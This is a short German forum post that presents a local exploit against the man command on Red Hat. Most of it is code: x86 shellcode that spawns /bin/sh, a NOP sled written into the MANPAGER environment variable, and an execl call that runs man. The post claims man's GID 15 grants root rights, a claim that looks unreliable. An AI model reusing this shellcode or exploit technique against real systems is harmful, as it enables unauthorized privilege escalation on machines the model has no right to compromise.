Die gängigen Exploits machen das eh.
Hier ein kurzgefasstes beispiel für ein Local Exploit (für Redhat) gegen das Man Kommando:
Es wird der Shellcode in die Umgebungsvariable geschrieben, die das Man Kommando verwendet, und somit dann vom Programm ausgeführt.
Code:
char *execshell =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
/* ë�^‰v�1ÀˆF�‰F�°�‰óN�V�Í€1Û‰Ø@Í€èÜÿÿÿ\bin\sh */
Da das Man Programm mit GID 15 läuft, führt es Programme mit Root Rechten aus.
Code:
noplen = BUFSIZE - strlen(execshell);
memset(buf, NOP, noplen);
buf[noplen+1] = '\0';
strcat(buf, execshell);
setenv("MANPAGER", buf, 1);
Der Shellcode wird in die Umgebungsvariable gesetzt.. und...
Code:
execl("/usr/bin/man", "man", "ls", 0);
Das Programm wird ausgeführt.
Das war das simpelste Beispiel was mir dazu eingefallen ist. Bei Beschwerden, oder sonstigen Rückmeldungen über dieses Posting, bitte ins Board schreiben. (Das gilt besonders für dich Bernie)
shellcode
Zitieren
)
